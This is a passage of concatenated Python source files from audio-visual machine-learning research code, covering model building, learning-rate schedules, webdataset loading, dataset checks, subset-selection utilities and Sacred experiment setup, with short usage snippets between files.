self.conv1 = nn.Conv2d(
dim_in,
dim_out,
[self.kernel[0], 1],
stride=[self.stride[0], 1],
padding=[self.padding[0], 0],
bias=False
)
self.bn1 = nn.BatchNorm2d(
dim_out, eps=self.eps, momentum=self.bn_mmt
)
self.relu1 = nn.ReLU(self.inplace_relu)
self.conv2 = nn.Conv2d(
dim_out,
dim_out,
[1, self.kernel[1]],
stride=[1, self.stride[1]],
padding=[0, self.padding[1]],
bias=False
)
self.bn2 = nn.BatchNorm2d(
dim_out, eps=self.eps, momentum=self.bn_mmt
)
self.relu2 = nn.ReLU(self.inplace_relu)
else:
self.conv = nn.Conv2d(
dim_in,
dim_out,
self.kernel,
stride=self.stride,
padding=self.padding,
bias=False,
)
self.bn = nn.BatchNorm2d(
dim_out, eps=self.eps, momentum=self.bn_mmt
)
self.relu = nn.ReLU(self.inplace_relu)
def forward(self, x):
if self.separable:
x = self.conv1(x)
x = self.bn1(x)
x = self.relu1(x)
x = self.conv2(x)
x = self.bn2(x)
x = self.relu2(x)
else:
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
```
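A quick shape check for the separable stem, assuming the classes above are in scope and PyTorch is installed; the kernel/stride/padding values are made up for illustration:

```python
import torch
# Assumes AudioModelStem from the file above is importable/in scope.
stem = AudioModelStem(
    dim_in=1, dim_out=64,
    kernel=[9, 9], stride=[1, 1], padding=[4, 4],
    separable=True,
)
x = torch.randn(8, 1, 80, 128)      # batch x channel x frequency x time
print(stem(x).shape)                # torch.Size([8, 64, 80, 128])
```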
#### File: code/models/build.py
```python
import torch
from fvcore.common.registry import Registry
MODEL_REGISTRY = Registry("MODEL")
MODEL_REGISTRY.__doc__ = """
Registry for video/audio model.
The registered object will be called with `obj(cfg)`.
The call should return a `torch.nn.Module` object.
"""
def build_model(cfg, model=None):
"""
Builds the audio/video model.
Args:
cfg (configs): configs that contains the hyper-parameters to build the
backbone. Details can be seen in config.py.
model (torch.nn.Module): Model module.
"""
if model is None:
# Construct the model
name = cfg.MODEL.TASK
model = MODEL_REGISTRY.get(name)(cfg)
# Determine the GPU used by the current process
cur_device = torch.cuda.current_device()
# Transfer the model to the current GPU device
model = model.cuda(device=cur_device)
# Use multi-process data parallel model in the multi-gpu setting
if cfg.NUM_GPUS > 1:
broadcast_buffers = False
if cfg.MODEL.TASK in ["Contrast"] and cfg.CONTRAST.USE_GLOBAL_BATCH:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)
broadcast_buffers = True
# Make model replica operate on the current device
model = torch.nn.parallel.DistributedDataParallel(
module=model,
device_ids=[cur_device],
output_device=cur_device,
broadcast_buffers=broadcast_buffers,
)
return model
```
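For context, a model becomes visible to `build_model` by registering it under the name used in `cfg.MODEL.TASK`; a minimal, hypothetical sketch (the class body is invented for illustration, only the registration pattern mirrors the code above):

```python
import torch.nn as nn
# Assumes MODEL_REGISTRY from the file above is importable.

@MODEL_REGISTRY.register()
class Contrast(nn.Module):          # looked up via cfg.MODEL.TASK == "Contrast"
    def __init__(self, cfg):
        super().__init__()
        self.proj = nn.Linear(512, 128)   # hypothetical layer

    def forward(self, x):
        return self.proj(x)
```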
#### File: evaluation/code/run_net.py
```python
import os
import torch
import utils.multiprocessing as mpu
from config import get_cfg
from contrast_net import contrast
from classify_net import classify
RUN_DICT = {
"Contrast": contrast,
"VisualClassify": classify,
"AudioClassify": classify,
"MultimodalClassify": classify,
}
def main():
"""
Main function to spawn the train and test process.
"""
cfg = get_cfg()
run = RUN_DICT[cfg.MODEL.TASK]
if cfg.NUM_GPUS > 1:
torch.multiprocessing.spawn(
mpu.run,
nprocs=cfg.NUM_GPUS,
args=(
cfg.NUM_GPUS,
run,
cfg.DIST_INIT_METHOD,
cfg.SHARD_ID,
cfg.NUM_SHARDS,
cfg.DIST_BACKEND,
cfg,
),
daemon=False,
)
else:
run(cfg=cfg)
if __name__ == "__main__":
torch.multiprocessing.set_start_method("forkserver")
main()
```
#### File: code/utils/lr_policy.py
```python
import math
def get_lr(
policy,
base_lr,
warmup_start_lr,
global_step,
num_optimizer_steps,
num_warmup_steps,
):
"""
Retrieve the learning rate of the current step with the option to perform
warm up in the beginning of the training stage.
Args:
policy (string): learning rate policy.
base_lr (float): base learning rate
warmup_start_lr (float): warmup start learning rate
global_step (int): current step
num_optimizer_steps (int): the number of total training steps.
num_warmup_steps (int): the number of total warmup steps.
"""
if policy == "linear":
alpha = lr_func_linear(global_step, num_optimizer_steps, num_warmup_steps)
lr = base_lr * alpha
elif policy == "cosine":
if global_step < num_warmup_steps:
alpha = lr_func_linear(global_step, num_optimizer_steps, num_warmup_steps)
lr = warmup_start_lr + (base_lr - warmup_start_lr) * alpha
else:
lr = lr_func_cosine(base_lr, global_step - num_warmup_steps, num_optimizer_steps - num_warmup_steps)
elif policy == "constant":
lr = base_lr
else:
raise NotImplementedError(
"Does not support {} learning policy".format(policy)
)
return lr
def lr_func_linear(current_step, num_training_steps, num_warmup_steps):
"""
Retrieve the learning rate scale using the linear learning rate schedule.
"""
if current_step < num_warmup_steps:
return float(current_step) / float(max(1, num_warmup_steps))
return max(0.0, float(num_training_steps - current_step) / float(max(1, num_training_steps - num_warmup_steps)))
def lr_func_cosine(base_lr, cur_epoch, num_optimizer_epochs):
"""
Retrieve the learning rate of the current step using the cosine learning
rate schedule.
"""
return (
base_lr
* (math.cos(math.pi * cur_epoch / num_optimizer_epochs) + 1.0)
* 0.5
)
```
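A small sanity check of the schedule, assuming the file above is importable as `lr_policy`; the hyper-parameters are arbitrary:

```python
from lr_policy import get_lr

for step in (0, 50, 100, 500, 1000):
    lr = get_lr(
        policy="cosine",
        base_lr=1e-3,
        warmup_start_lr=1e-5,
        global_step=step,
        num_optimizer_steps=1000,
        num_warmup_steps=100,
    )
    print(step, f"{lr:.6f}")
# Linear warmup from 1e-5 towards 1e-3 over the first 100 steps,
# then cosine decay towards 0 at step 1000.
```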
#### File: acav100m/feature_extraction/check_output.py
```python
import tarfile
from multiprocessing import Pool
import numpy as np
import subprocess
import os
from pathlib import Path
import math
import time
from datetime import datetime
from functools import partial
import argparse
from collections import defaultdict, Counter
import json
import pickle
import csv
import shutil
from tqdm import tqdm
import pandas as pd
def parse_args():
parser = argparse.ArgumentParser(description="construct ms100m dataset")
parser.add_argument("--feat_dir", type=str, required=True, help="feature directory")
# parser.add_argument("--new_feat_dir", type=str, required=True, help="new feature directory")
parser.add_argument("--input_dir", type=str, required=True, help="input directory")
parser.add_argument("--num_workers", type=int, default=1)
args = parser.parse_args()
return args
def run(cmd):
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate()
return out.decode('utf-8')
def get_filenames_of_shard(shard_path):
cmd = [
"tar", "tvf", shard_path,
]
out = run(cmd)
out = out.strip().split('\n')
filenames = [Path(f.split()[-1]).name for f in out if f.endswith('mp4')]
return filenames
def indexing(pkl_path):
shard_name = pkl_path.stem
with open(pkl_path, "rb") as f:
feats_shard = pickle.load(f)
filenames = [feat['filename'] for feat in feats_shard]
return shard_name, filenames
if __name__ == "__main__":
args = parse_args()
print(args)
print("datset feature dir: {}".format(args.feat_dir))
feats_path = sorted(Path(args.feat_dir).glob("*.pkl"))
print("dataset indexing start...")
if args.num_workers > 1:
with Pool(args.num_workers) as pool:
results = list(
tqdm(
pool.imap(indexing, feats_path),
ncols=80,
total=len(feats_path),
)
)
else:
results = []
for pkl_path in tqdm(feats_path, total=len(feats_path), ncols=80):
results.append(indexing(pkl_path))
dataset_dict = {}
for shard_name, filenames in results:
dataset_dict[shard_name] = filenames
print("dataset indexing done...")
input_shard_names = sorted(list(dataset_dict.keys()))
duplicate_files = defaultdict(list)
print("duplicate checking...")
for shard_name in tqdm(input_shard_names, ncols=80):
if len(set(dataset_dict[shard_name])) != len(dataset_dict[shard_name]):
filename_counter = Counter(dataset_dict[shard_name])
for filename in set(dataset_dict[shard_name]):
if filename_counter[filename] > 1:
duplicate_files[shard_name] += [(filename, filename_counter[filename])]
num_duplicate_files = sum([len(duplicate_files[shard_name]) for shard_name in duplicate_files])
print(f"# of duplicate files: {num_duplicate_files}")
with open("dulicate_files.pkl", "wb") as f:
pickle.dump(duplicate_files, f)
non_matching_files = defaultdict(list)
feat_dir = Path(args.feat_dir)
    # --new_feat_dir is commented out above; only resolve it when provided
    # (it is needed solely by the commented-out cleanup block below).
    new_feat_dir = Path(args.new_feat_dir) if getattr(args, 'new_feat_dir', None) else None
for shard_name in tqdm(input_shard_names, ncols=80):
with open(os.path.join(args.input_dir, f"{shard_name}.json"), "r") as j:
meta_shard = json.load(j)
filenames = [meta['filename'] for meta in meta_shard]
for filename in dataset_dict[shard_name]:
if filename not in filenames:
non_matching_files[shard_name] += [filename]
num_non_matching_files = sum([len(non_matching_files[shard_name]) for shard_name in non_matching_files])
print(f"# of non matching files: {num_non_matching_files}")
with open("non_matching_files.pkl", "wb") as f:
pickle.dump(non_matching_files, f)
'''
if len(non_matching_files) > 0:
print(f"deleting non matching files")
new_feat_dir.mkdir(exist_ok=True, parents=True)
for shard_name in tqdm(input_shard_names, ncols=80):
pkl_path = feat_dir.joinpath(f"{shard_name}.pkl")
new_pkl_path = new_feat_dir.joinpath(f"{shard_name}.pkl")
if shard_name in non_matching_files:
with open(pkl_path, "rb") as f:
feats = pickle.load(f)
new_feats = [feat for feat in feats if feat['filename'] not in non_matching_files[shard_name]]
with open(new_pkl_path, "wb") as f:
pickle.dump(new_feats, f)
else:
shutil.copy(str(pkl_path), new_pkl_path)
'''
```
#### File: code/data/loader.py
```python
import numpy as np
import torch
from torch.utils.data import DataLoader, IterableDataset
import webdataset as wds
from .webdataset import get_dataset
from utils import identity
from mps import distributed as du
def get_dataloader(args, model, drop_last=False, shuffle=False):
dataset, num_workers = get_dataset(args, model, shuffle=shuffle)
media_path = args.data.media.path
use_webdataset = (
media_path.stem not in ['HMDB51', 'UCF101', 'FSDD', 'KineticsSounds']
)
if isinstance(args.computation.num_gpus, int):
world_size = min(du.get_world_size(), args.computation.num_gpus)
else:
world_size = du.get_world_size()
batch_size = int(args.data.batch_size / world_size)
if isinstance(dataset, IterableDataset):
shuffle = False
dataloader = DataLoader(
dataset, batch_size,
shuffle=shuffle,
drop_last=drop_last,
num_workers=num_workers,
collate_fn=identity)
return dataloader
def collate(batch):
elem = batch[0]
'''
if isinstance(elem, tuple):
batch = [{**elem[0], 'label': elem[1]} for elem in batch]
elem = batch[0]
'''
collated = {}
pathways_packed = False
for key in elem.keys():
vals = [row[key] for row in batch]
if isinstance(elem[key], np.ndarray):
vals = [torch.Tensor(val) for val in vals]
# stack if possible
if same_shape(vals):
vals = torch.stack(vals, dim=0)
if key == 'data' and packed_pathways(vals):
try:
vals = [torch.stack(v, dim=0) for v in zip(*vals)]
pathways_packed = True
except Exception as e:
print(f"error stacking slowfast features within a batch: {e}")
batch_filenames = [row['filename'] for row in batch]
print(f"filenames in batch: {batch_filenames}")
raise Exception
collated[key] = vals
options = {'pathways_packed': pathways_packed}
return collated, options
def are_tensors(li):
return all([torch.is_tensor(x) for x in li])
def same_shape(li):
if not are_tensors(li):
return False
shapes = [x.shape for x in li]
return all(x == shapes[0] for x in shapes)
def packed_pathways(li):
if not isinstance(li[0], list):
return False
if not torch.is_tensor(li[0][0]):
return False
all_shapes = [[p.shape for p in pathway] for pathway in zip(*li)]
return all([all(x == shapes[0] for x in shapes) for shapes in all_shapes])
```
#### File: code/data/meta.py
```python
import tarfile
import json
from pathlib import Path
from tqdm import tqdm
from mps import distributed as du
from utils import load_pickle, dump_pickle
def load_metadata(args, shard_paths):
if args.data.meta.path is not None:
meta_path = Path(args.data.meta.path)
cache_path = meta_path / 'meta_cache.pkl'
if cache_path.is_file():
shards_size_dt = load_pickle(cache_path)
to_load = [p for p in shard_paths if Path(p).stem not in shards_size_dt.keys()]
if len(to_load) > 0:
_, _, shards_size_dt_upd = _load_metadata(args, to_load)
shards_size_dt = {**shards_size_dt, **shards_size_dt_upd}
dump_pickle(shards_size_dt, cache_path)
else:
_, _, shards_size_dt = _load_metadata(args, shard_paths)
dump_pickle(shards_size_dt, cache_path)
else:
_, _, shards_size_dt = _load_metadata(args, shard_paths)
return shards_size_dt
def _load_metadata(args, shard_paths):
shards_size = []
shards_size_dt = {}
metadata = {}
pbar = shard_paths
if du.get_rank() == 0:
# only for one process
print("loading metadata from json files")
pbar = tqdm(shard_paths)
for shard_path in pbar:
shard_name = Path(shard_path).stem
if args.data.meta.path is not None:
meta_path = Path(args.data.meta.path)
if meta_path.is_dir():
meta_path = meta_path / "{}.json".format(shard_name)
else:
meta_path = Path(shard_path).parent / "{}.json".format(shard_name)
if meta_path.is_file():
filenames = get_filenames_from_tar(shard_path)
with open(meta_path, 'r') as f:
shard_file = json.load(f)
filenames_in_meta = set([Path(line['filename']).stem for line in shard_file])
# count = len(shard_file)
filenames = filenames & filenames_in_meta
count = len(filenames)
for line in shard_file:
idx = Path(line['filename']).stem
if idx in filenames:
line['shard_size'] = count
line['shard_name'] = shard_name
metadata[idx] = line
'''
else:
print(f"filename {idx} in tar file ({shard_path}) not present in metadata json file ({meta_path})")
'''
shards_size.append(count)
shards_size_dt[shard_name] = count
return metadata, shards_size, shards_size_dt
def get_filenames_from_tar(path):
with tarfile.open(path, 'r') as f:
filenames = set([Path(filename).stem for filename in f.getnames()])
return filenames
```
#### File: code/data/webdataset.py
```python
import json
import tarfile
import types
from pathlib import Path
from functools import partial
# import braceexpand
import torch
import webdataset as wds
from tqdm import tqdm
from save import load_shard_caches
from utils import get_num_workers, get_tensor_size, identity
from .shards import get_shards_size, get_shards_path
from .preprocess import Preprocessors
from .video import load_video_webdata
from .metawebdataset import MetaWebDataset
from mps import distributed as du
def _get_name(finfo, id_len=12):
path = finfo['__key__']
key = Path(path).stem
filename = Path(path).name
start = int(key[id_len:])
return finfo['mp4'], {'idx': key, 'start': start, 'filename': filename,
#'shard_size': finfo['shard_size'],
'shard_name': finfo['shard_name']}
def _add_meta(row, shards_size_dt):
videos, meta = row
name = meta['shard_name']
meta['shard_size'] = shards_size_dt[name]
# meta = {**meta, **metadata[idx]}
return {key: {**meta, **video} for key, video in videos.items()}
def get_dataset(args, models, shuffle=False):
shards_path, rest = get_shards_path(args, f=get_shards_size)
if isinstance(args.computation.num_gpus, int):
world_size = min(du.get_world_size(), args.computation.num_gpus)
else:
world_size = du.get_world_size()
batch_size = int(args.data.batch_size / world_size)
# Here, shards_path is the list of paths to shards allocated to current node (gpu)
# (after discarding if args.computation.discard_shards is set)
num_workers, effective_num_workers = get_num_workers(
args.computation.num_workers, len(shards_path)
)
out_str = "#Workers of Feature Extraction Dataset"
out_str += f" (node={du.get_rank()})"
out_str += f": {num_workers}"
print(out_str)
shards_size_dt = rest['shards_size_dt']
shard_names = [Path(p).stem for p in shards_path]
if args.acav.force_cache_restart:
skip_lists = {}
caches = None
shards_size = [shards_size_dt[key] for key in shard_names]
else:
caches, skip_lists = load_shard_caches(args, shards_path)
shards_size = [shards_size_dt[key] - len(skip_lists[key]) for key in shard_names]
# print('building dataset')
data = MetaWebDataset(shards_path, handler=wds.warn_and_continue,
skip_lists=skip_lists)
id_len = 25 if args.acav.use_replicates else 12
get_name = partial(_get_name, id_len=id_len)
load_video = partial(load_video_webdata,
num_frames=args.data.media.num_frames,
duration=args.acav.duration,
skip_shorter_seconds=args.acav.duration * args.acav.skip_shorter_ratio)
add_meta = partial(_add_meta, shards_size_dt=rest['shards_size_dt'])
preprocess = Preprocessors(args, models)
data = (
data
.map(get_name, handler=wds.warn_and_continue)
.map_tuple(load_video, identity, handler=wds.warn_and_continue)
.pipe(drop_none)
.map_tuple(preprocess, identity, handler=wds.warn_and_continue)
# .pipe(drop_none_post)
.map(check_data_none, handler=wds.warn_and_continue)
.map(add_meta, handler=wds.warn_and_continue)
)
if shuffle:
data = data.shuffle(args.computation.shuffle_bufsize)
'''
if the actual number of datapoints is smaller than length,
the ResizedDataset will fill the difference with duplicate datapoints
'''
# Here, shards_size is the list of sizes of all input shards, not those allocated on current
# node (gpu)
# (after discarding if args.computation.discard_shards is set)
# print('resizing dataset')
'''
if du.get_rank() == 0:
print("total dataset_size: {}".format(sum(shards_size)))
'''
print("rank {} dataset_size: {}".format(du.get_rank(), shards_size))
length = du.get_length(
shards_size, batch_size, args.computation.num_workers, world_size
)
nominal = length * effective_num_workers
# print('X', shards_size, length, effective_num_workers, args.computation.num_workers)
data = wds.ResizedDataset(
data,
length,
nominal,
)
data.caches = caches
return data, num_workers
def _decode_label(anno, class2idx):
label = anno['annotations']['label']
return torch.tensor(class2idx[label], dtype=torch.long)
def drop_none(it):
for row in it:
data, label = row
if data is not None and \
data[0][0] is not None and \
data[1][0] is not None:
yield data, label
def check_data_none(row):
videos, meta = row
assert meta is not None, 'metadata is None'
assert videos is not None, 'data is None'
for model_name, video in videos.items():
assert isinstance(video, dict), 'data is not a dict'
assert video['data'] is not None, 'data feature is None'
return row
def _preprocess(data, model):
if data is None or data[0][0] is None or data[1][0] is None:
return None
else:
output = model.preprocess(*data) # {'data': preprocessed, 'fps': fps}
if 'data' in output and get_tensor_size(output['data']) == 0:
return None # no element
else:
return output
```
#### File: subset_selection/code/args.py
```python
import os
import sys
from pathlib import Path
import torch
from munch import DefaultMunch
from config import defaults
def get_args(**kwargs):
args = defaults
args = update_args(args, kwargs)
args = process_paths(args)
args = objectify(args)
args.computation.device = 'cpu'
if args.computation.use_gpu:
if torch.cuda.device_count() > 0:
print("using gpu")
args.computation.device = 'cuda'
else:
print("no gpu available, defaulting to cpu")
if args.computation.num_gpus is None:
args.computation.num_gpus = sys.maxsize
args.computation.num_gpus = min(
args.computation.num_gpus,
torch.cuda.device_count()
)
print("args:")
print(args)
return args
def update_args(args, *additional_args):
for new_args in additional_args:
args = _update_args(args, new_args)
return args
def _update_args(args, new_args):
def _recurse(keys, args, v):
if len(keys) > 0:
current, keys = keys[0], keys[1:]
dt = args[current] if current in args else {}
args[current] = _recurse(keys, dt, v)
return args
else:
return v
for k, v in new_args.items():
keys = k.split('.')
args = _recurse(keys, args, v)
return args
def process_paths(args):
suffixes = ['_file', '_dir']
def _recurse(args):
if 'path' in args and args['path'] is not None:
args['path'] = Path(args['path']).resolve()
for k, v in args.items():
for suffix in suffixes:
if k.endswith(suffix) and v is not None:
args[k] = Path(v).resolve()
break
if isinstance(v, dict):
args[k] = _recurse(v)
return args
args = _recurse(args)
return args
def objectify(args):
def _recurse(dt):
for k, v in dt.items():
if isinstance(v, dict):
dt[k] = _recurse(v)
dt = DefaultMunch(None, dt)
return dt
return _recurse(args)
```
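The dotted-key overrides accepted by `get_args(**kwargs)` are resolved by `update_args`; a short sketch of that behaviour, assuming the file above is importable as `args` (with its `config`/`munch` dependencies available):

```python
from args import update_args

base = {'computation': {'num_gpus': 4, 'num_workers': 8}, 'data': {'batch_size': 64}}
new = update_args(base, {'computation.num_gpus': 1, 'data.media.path': '/tmp/clips'})
print(new['computation']['num_gpus'])   # 1
print(new['data']['media']['path'])     # /tmp/clips (nested dicts are created on demand)
```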
#### File: subset_selection/code/multiprocess.py
```python
import time
import datetime
from multiprocessing import Pool
def multiprocess(func, data, num_workers=1, granularity='shards',
log_every=1000, verbose=False):
start = time.time()
if num_workers > 1:
if verbose:
print("parallel processing")
out = {}
with Pool(num_workers) as p:
count = 0
chunksize = max(1, len(data) // (num_workers))
for i, res in p.imap_unordered(func, enumerate(data), chunksize=chunksize):
out[i] = res
count += 1
if verbose:
if (count + 1) % log_every == 0:
                        elapsed = time.time() - start
                        elapsed = str(datetime.timedelta(seconds=elapsed))
                        print("{}/{} {} processed (elapsed: {})".format(count, len(data), granularity, elapsed))
else:
if verbose:
print("sequential processing")
out = []
count = 0
for i, x in enumerate(data):
i, res = func((i, x))
out.append(res)
count += 1
if verbose:
if (count + 1) % log_every == 0:
                    elapsed = time.time() - start
                    elapsed = str(datetime.timedelta(seconds=elapsed))
                    print("{}/{} {} processed (elapsed: {})".format(count, len(data), granularity, elapsed))
out = dict(enumerate(out))
if verbose:
print("sorting multiprocess outputs")
out = [out[k] for k in sorted(list(out.keys()))]
return out
```
#### File: subset_selection/code/pairing.py
```python
from itertools import combinations, product
from collections import defaultdict
def get_cluster_pairing(keys, cluster_pairing):
pairing_dict = {
'diagonal': get_diagonal,
'bipartite': get_bipartite,
'combination': get_combination,
}
cluster_pairing = cluster_pairing.lower()
assert cluster_pairing in pairing_dict, f"invalid cluster pairing type: {cluster_pairing}"
return pairing_dict[cluster_pairing](keys)
def get_combination(keys):
clustering_indices = range(len(keys))
group_size = 2
clustering_combinations = combinations(clustering_indices, group_size)
return list(clustering_combinations)
def get_bipartite(keys):
keys = {v: i for i, v in enumerate(keys)}
views = defaultdict(list)
for key, idx in keys.items():
view = key[0] # get dataset+model name
views[view].append(idx)
views = list(views.values())
return list(product(*views))
def get_diagonal(keys):
keys = {v: i for i, v in enumerate(keys)}
clustering_names = defaultdict(list)
for key, idx in keys.items():
view = key[0] # get dataset+model name
clustering_name = key[1]
clustering_names[clustering_name].append(idx)
pairs = list(clustering_names.values())
return pairs
``` |
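A toy illustration of the three pairing schemes, assuming the file above is importable as `pairing`; keys are `(view, clustering_name)` tuples as used by the callers:

```python
from pairing import get_cluster_pairing

keys = [('video', 'c0'), ('video', 'c1'), ('audio', 'c0'), ('audio', 'c1')]
print(get_cluster_pairing(keys, 'combination'))  # every index pair: (0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3)
print(get_cluster_pairing(keys, 'bipartite'))    # video x audio: (0, 2), (0, 3), (1, 2), (1, 3)
print(get_cluster_pairing(keys, 'diagonal'))     # grouped by clustering name: [0, 2], [1, 3]
```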
{
"source": "JiwanChung/tapm",
"score": 2
} |
#### File: tapm/code/cli.py
```python
import os
import json
from exp import ex
from args import get_args
from train import _train
from utils import wait_for_key, count_parameters
from evaluate import _evaluate
from infer import _infer
from vis_tsne import _tsne, _silhouette
from distance import _distance
from extract_keyword import extract_and_save_all
from model import get_model_options
from ckpt import get_model_ckpt
from loss.loss import get_loss
from optimizer import get_optimizer
from data.dataloader import get_dataloaders
from logger import get_logger
from scripts import run_script
@ex.capture
def prepare_model(model_name):
return get_model_ckpt(model_name)
def prepare(no_logger=False):
logger = get_logger(log_file=no_logger)
model, tokenizer, ckpt, datasets, epoch = prepare_model()
dataloaders = get_dataloaders(datasets, model.make_batch, tokenizer)
'''
args.batch_per_epoch = {}
for key in dataloaders.keys():
args.batch_per_epoch[key] = \
math.ceil(len(dataloaders[key]) / args.batch_sizes[key])
'''
loss_fn = get_loss(padding_idx=tokenizer.pad_id)
optimizers = get_optimizer(model, dataloaders)
model.ckpt_epoch = epoch
return model, loss_fn, optimizers, tokenizer, dataloaders, logger
@ex.command
def train():
all_args = prepare()
res = _train(*all_args)
logger = all_args[-1]
# hold process to keep tensorboard alive
if 'tfboard' in logger.logger_dests:
wait_for_key()
return res
@ex.command
def evaluate(log_path):
all_args = prepare(no_logger=True)
stats, _, texts = _evaluate(*all_args, key='val', print_output=False)
print(stats)
model = all_args[0]
assert hasattr(model, 'ckpt_path'), "no ckpt loaded"
path = model.ckpt_path
parent = path.parent.parent.parent
dir_name = path.parent.stem
parent = parent / "evals" / dir_name
os.makedirs(parent, exist_ok=True)
with open(parent / 'eval_stats.json', 'w') as f:
json.dump(stats, f)
with open(parent / 'eval_text.json', 'w') as f:
json.dump(texts, f)
@ex.command
def tsne(log_path, test_path):
# all_args = prepare({'use_data': 'val', 'sample': True})
all_args = prepare()
_tsne(*all_args, key='test')
@ex.command
def silhouette(log_path):
# all_args = prepare({'use_data': 'val', 'sample': True})
all_args = prepare()
_silhouette(*all_args, key='test')
@ex.command
def distance(log_path):
# all_args = prepare({'use_data': 'val', 'sample': True})
all_args = prepare()
_distance(*all_args, key='val')
@ex.command
def infer():
#all_args = prepare({'use_data': 'val'})
all_args = prepare()
texts = _infer(*all_args)
@ex.command
def model_stats():
#all_args = prepare({'use_data': 'val'})
all_args = prepare(no_logger=True)
model = all_args[0]
stats = {}
stats['parameter_counts'] = count_parameters(model)
print(stats)
@ex.command
def extract():
model, _, _, tokenizer, \
dataloaders, _ = prepare()
for dataloader in dataloaders.values():
dataloader.training = False
extract_and_save_all(model, tokenizer, dataloaders)
@ex.command
def scripts(script):
run_script(script)
@ex.command
def print_models():
print(sorted(get_model_options()))
@ex.option_hook
def update_args(options):
args = get_args(options)
print(sorted(args.items()))
ex.add_config(args)
@ex.automain
def run():
train()
```
#### File: code/data/dataloader.py
```python
import json
from torch.utils import data
from munch import Munch
from nltk.stem import WordNetLemmatizer
from exp import ex
from .task_loaders import load_tasks
from .tokenizer import build_tokenizer
class Dataset(data.Dataset):
def __init__(self, data_path):
super(Dataset, self).__init__()
self.data, self.global_data, \
self.task, self.path = load_tasks(data_path)
self.list_ids = list(self.data.keys())
def __len__(self):
return len(self.list_ids)
def __getitem__(self, idx):
idx = self.list_ids[idx]
return idx, self.data[idx]
class DataLoader(data.DataLoader):
def __init__(self, *args, **kwargs):
self.name = kwargs.pop('name')
self.training = kwargs.pop('training', self.name == 'train')
self.device = kwargs.pop('device')
self.tokenizer = kwargs.pop('tokenizer')
self.make_batch = kwargs.pop('batch_func')
self.max_sentence_tokens = kwargs.pop('max_sentence_tokens')
self.feature_name_map = kwargs.pop('feature_name_map')
self.concat_group = kwargs.pop('concat_group')
self.use_vist = kwargs.pop('use_vist')
self.force_ascii = kwargs.pop('force_ascii')
self.lemmatizer = WordNetLemmatizer()
kwargs['collate_fn'] = self.pad_collate
super(DataLoader, self).__init__(*args, **kwargs)
self.task = self.dataset.task
self.path = self.dataset.path
def pad_collate(self, data_li):
ids, sent_li = zip(*data_li)
res = self.make_batch(self.tokenizer, sent_li, **self.dataset.global_data,
max_sentence_tokens=self.max_sentence_tokens,
lemmatize=self.lemmatizer.lemmatize,
feature_name_map=self.feature_name_map,
concat_group=self.concat_group,
use_vist=self.use_vist,
force_ascii=self.force_ascii)
res = Munch(res)
res.id = ids
return res
@ex.capture
def get_datasets(paths, pretrain_paths, use_data):
datasets = {}
pretrain_datasets = {}
for k, p in paths.items():
if k in use_data:
print("loading {} data".format(k))
datasets[k] = Dataset(p)
if k in pretrain_paths:
print("loading pretraining {} data".format(k))
ppath = pretrain_paths[k]
if isinstance(ppath, list):
li = []
for p in ppath:
li.append(Dataset(p))
pretrain_datasets[k] = li
else:
pretrain_datasets[k] = Dataset(pretrain_paths[k])
else:
pretrain_datasets[k] = datasets[k]
return {'target': datasets, 'pretrain': pretrain_datasets}
@ex.capture
def get_dataloaders(datasets, batch_func, tokenizer,
batch_sizes, num_workers, device,
max_sentence_tokens, feature_name_map, concat_group,
use_vist, force_ascii):
dataloaders = {}
for dataset_type, type_dataset in datasets.items():
type_dataloaders = {}
for k, dataset in type_dataset.items():
shuffle = True if k == 'train' else False
def get_dataloader(dset):
nonlocal shuffle
nonlocal k
return DataLoader(dset, name=k,
batch_size=batch_sizes[k],
shuffle=shuffle, num_workers=num_workers,
batch_func=batch_func,
tokenizer=tokenizer, device=device,
max_sentence_tokens=max_sentence_tokens,
feature_name_map=feature_name_map,
concat_group=concat_group,
use_vist=use_vist,
force_ascii=force_ascii)
if isinstance(dataset, list):
li = []
for dset in dataset:
li.append(get_dataloader(dset))
type_dataloaders[k] = li
else:
type_dataloaders[k] = get_dataloader(dataset)
dataloaders[dataset_type] = type_dataloaders
return dataloaders
```
#### File: tapm/code/exp.py
```python
import inspect
from pathlib import Path
import json
import sacred
from sacred.utils import optional_kwargs_decorator
from sacred.config.signature import Signature
from sacred.config.captured_function import create_captured_function
from sacred.observers import MongoObserver, SlackObserver
#torch.multiprocessing.set_sharing_strategy('file_system') # https://github.com/pytorch/pytorch/issues/973
class LazyCapture:
def __init__(self, function=None, prefix=None):
self.fn = function
self.prefix = prefix
self.__name__ = self.fn.__name__
self.signature = Signature(self.fn)
def update_obj(self, wrap):
self.config = wrap.config
self.rnd = wrap.rnd
self.run = wrap.run
self.logger = wrap.logger
self.signature = wrap.signature
def update_func(self, cfn):
cfn.config = self.config
cfn.rnd = self.rnd
cfn.run = self.run
cfn.logger = self.logger
cfn.signature = self.signature
return cfn
def __call__(self, *args, **kwargs):
if not hasattr(self, 'lazy_fn'):
self.lazy_fn = create_captured_function(self.fn, prefix=self.prefix)
self.lazy_fn = self.update_func(self.lazy_fn)
return self.lazy_fn(*args, **kwargs)
def wrap_capture(function=None, prefix=None):
lazy_capture = LazyCapture(function, prefix=prefix)
def captured_function(*args, **kwargs):
lazy_capture.update_obj(captured_function)
return lazy_capture(*args, **kwargs)
captured_function.signature = lazy_capture.signature
captured_function.prefix = lazy_capture.prefix
return captured_function
class Experiment(sacred.Experiment):
@optional_kwargs_decorator
def capture(self, function=None, prefix=None):
if function in self.captured_functions:
return function
captured_function = wrap_capture(function, prefix=prefix)
self.captured_functions.append(captured_function)
return captured_function
exp_name = 'lsmdc'
ex = Experiment(exp_name)
def load_config(path):
path = Path(path).resolve()
if path.is_file():
with open(path, 'r') as f:
return json.load(f)
else:
return None
def add_observers():
obs_config = load_config('../observers/config.json')
if obs_config is not None and obs_config['observe']:
if 'mongo' in obs_config and obs_config['mongo']:
port = obs_config['port']
hostname = obs_config.get('hostname', 'localhost')
username = obs_config['username']
password = obs_config['password']
print(f"loading mongo observer at {hostname}:{port}")
ex.observers.append(
MongoObserver.create(
url=f'mongodb://{username}:{password}@{hostname}:{port}/{exp_name}',
db_name=exp_name))
if 'slack' in obs_config and obs_config['slack']:
print("loading slack observer")
slack_path = Path('../observers/slack.json').resolve()
if slack_path.is_file():
slack_obs = SlackObserver.from_config(str(slack_path))
ex.observers.append(slack_obs)
add_observers()
```
#### File: tapm/code/extract_keyword.py
```python
